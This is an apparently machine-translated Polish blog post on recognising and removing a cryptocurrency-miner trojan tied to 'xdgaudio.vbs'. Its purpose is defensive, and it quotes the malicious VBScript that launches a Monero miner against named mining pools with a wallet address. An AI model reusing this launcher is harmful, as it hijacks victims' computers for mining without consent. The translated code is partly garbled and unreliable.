Jeśli w systemie pojawia się następujący komunikat o błędzie dotyczący „xdgaudio.vbs”, najprawdopodobniej Twój komputer jest zainfekowany.
Skrypt: C: windows xdgaudio.vbs
Linia: 3
Char: 1
Błąd: system nie może znaleźć określonego pliku.
Kod: 80070002
Źródło: (null)
Podczas edytowania za pomocą Notatnika skrypt może zawierać wiersze, takie jak poniżej:
Dim WShell Ustaw WShell = CreateObject ('WScript.Shell') WShell.Run 'wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o warstwy + TCP: //xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -px -k -o warstwy + TCP: //mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x”0 Ustaw WShell = Nothing
To z pewnością wygląda jak trojan CPU / Cryptocurrency Miner, który nie tylko spowalnia twój komputer, ale także może stanowić zagrożenie dla bezpieczeństwa. Pliki skryptów c: windows xdgaudio.vbs i c: windows servicecrsssr.vbs należy usunąć. To nie wystarczy. Przeprowadź dokładne skanowanie za pomocą ochrony przed złośliwym oprogramowaniem Malwarebytes, a także przeskanuj za pomocą oprogramowania antywirusowego, którego używasz.
Aby uzyskać szczegółowe instrukcje dotyczące usuwania takiego trojana Miner, zapoznaj się z przewodnikiem malwaretips.com Jak usunąć trojana CPU Miner z systemu Windows (przewodnik po wirusach) .
Jedna mała prośba: jeśli podobał Ci się ten post, udostępnij go?
Jedna „mała” część od Ciebie bardzo pomogłaby w rozwoju tego bloga. Kilka świetnych sugestii:- Przypiąć!
- Udostępnij to na swoim ulubionym blogu + Facebook, Reddit
- Tweetnij to!